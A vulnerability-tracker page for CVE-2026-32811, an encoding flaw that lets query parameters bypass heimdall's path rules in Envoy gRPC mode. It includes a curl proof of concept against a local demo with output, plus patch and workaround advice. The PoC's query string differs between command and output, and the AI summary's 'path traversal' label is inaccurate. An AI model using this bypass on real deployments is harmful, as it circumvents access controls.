Skip to main content

Docker CVE-2026-32811

HIGH
Improper Encoding or Escaping of Output (CWE-116)
2026-03-18 https://github.com/dadrus/heimdall GHSA-r8x2-fhmf-6mxp
8.2
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.2 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
SUSE
HIGH
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
High
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 18, 2026 - 13:15 vuln.today
Patch released
Mar 18, 2026 - 13:15 nvd
Patch available
CVE Published
Mar 18, 2026 - 13:00 nvd
HIGH 8.2

DescriptionGitHub Advisory

Summary

When using heimdall in envoy gRPC decision API mode, wrong encoding of the query URL string allows rules with non-wildcard path expressions to be bypassed.

The HTTP based decision API is NOT affected, and proxy mode is NOT affected either.

Note: The issue can only lead to unintended access if heimdall is configured with an "allow all" default rule. Since v0.16.0, heimdall enforces secure defaults and refuses to start with such a configuration unless this enforcement is explicitly disabled, e.g. via --insecure-skip-secure-default-rule-enforcement or the broader --insecure flag.

Details

Envoy splits the requested URL into parts, and sends the parts individually to heimdall. Although query and path are present in the API, the query field is documented to be always empty and the URL query is included in the path field [1].

The implementation uses go's url library to reconstruct the url which automatically encodes special characters in the path.

https://github.com/dadrus/heimdall/blob/1faba9e4160bd7ab3240cf6aa418e21bfef3401a/internal/handler/envoyextauth/grpcv3/request_context.go#L109-L115

As a consequence, a parameter like /mypath?foo=bar to Path is escaped into /mypath%3Ffoo=bar. Subsequently, a rule matching /mypath no longer matches and is bypassed.

PoC

Using the example docker compose setup, the demo:public rule is bypassed when adding a query parameter.

> docker compose -f docker-compose-envoy-grpc.yaml -f docker-compose.yaml up

curl http://127.0.0.1:9090/public
Hostname: 80201fead1c7
IP: 127.0.0.1
IP: ::1
IP: 172.23.0.3
RemoteAddr: 172.23.0.5:37056
GET /public HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: curl/8.19.0
Accept: */*
X-Envoy-Expected-Rq-Timeout-Ms: 15000
X-Forwarded-Proto: http
X-Request-Id: 0a1f0f06-75ef-4f14-92af-16162ea1d9e5

curl -v http://127.0.0.1:9090/public?bypass
*   Trying 127.0.0.1:9090...
* Established connection to 127.0.0.1 (127.0.0.1 port 9090) from 127.0.0.1 port 47876
* using HTTP/1.x
> GET /public?hallo HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/8.19.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 401 Unauthorized
< date: Sat, 14 Mar 2026 16:34:17 GMT
< server: envoy
< content-length: 0
<
* Connection #0 to host 127.0.0.1:9090 left intact

When using the HTTP decision API variant, the second request is matched by the rule as well:

> docker compose -f docker-compose-envoy-http.yaml -f docker-compose.yaml up

curl http://127.0.0.1:9090/public?bypass
Hostname: 80201fead1c7
IP: 127.0.0.1
IP: ::1
IP: 172.23.0.4
RemoteAddr: 172.23.0.2:38044
GET /public?hallo HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: curl/8.19.0
Accept: */*
X-Envoy-Expected-Rq-Timeout-Ms: 15000
X-Forwarded-Proto: http
X-Request-Id: 5c961bc6-ad03-4a44-982b-abe04566fdd2

Impact

Everyone using heimdall with the envoy gRPC API may be affected. Users who configured a deny list in heimdall (with an allow-all default rule) are affected, as attackers can potentially circumvent a specific block rule by adding query parameters.

[1] https://github.com/envoyproxy/envoy/blob/105b4acd422d67fcff908ec38d91c7676d079939/api/envoy/service/auth/v3/attribute_context.proto#L146-L147

AnalysisAI

Heimdall, an authorization decision API for Envoy proxy, contains a path traversal bypass vulnerability when used in gRPC decision API mode. Attackers can bypass non-wildcard path expression rules by appending query parameters to URLs, which causes incorrect URL encoding that prevents rule matching. A proof-of-concept is publicly available demonstrating the bypass, though exploitation requires heimdall to be configured with an insecure 'allow all' default rule (which is blocked by secure defaults since v0.16.0 unless explicitly disabled).

Technical ContextAI

This vulnerability affects the heimdall Go package (pkg:go/github.com_dadrus_heimdall) when integrated with Envoy's gRPC external authorization API (envoy.service.auth.v3). The root cause is CWE-116 (Improper Encoding or Escaping of Output). Envoy sends URL components separately with query parameters embedded in the path field, but heimdall's URL reconstruction using Go's url library automatically encodes special characters. This transforms '/mypath?foo=bar' into '/mypath%3Ffoo=bar', causing path-based authorization rules matching '/mypath' to fail. The HTTP decision API and proxy mode correctly handle URL encoding and are not affected.

RemediationAI

Apply the patch available in commit 50321b3007db1ccafdc6b1cfd6bdc3689c19a502 (https://github.com/dadrus/heimdall/commit/50321b3007db1ccafdc6b1cfd6bdc3689c19a502) and pull request #3106 (https://github.com/dadrus/heimdall/pull/3106). If immediate patching is not possible, ensure heimdall is configured with secure defaults by avoiding 'allow all' default rules and not using the --insecure-skip-secure-default-rule-enforcement or --insecure flags. Consider switching from gRPC decision API mode to HTTP decision API mode as a temporary workaround, as the HTTP variant is not affected by this encoding issue. Review authorization rules to ensure they follow a default-deny approach rather than deny-list patterns.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Vendor StatusVendor

SUSE

Severity: High
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-32811 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy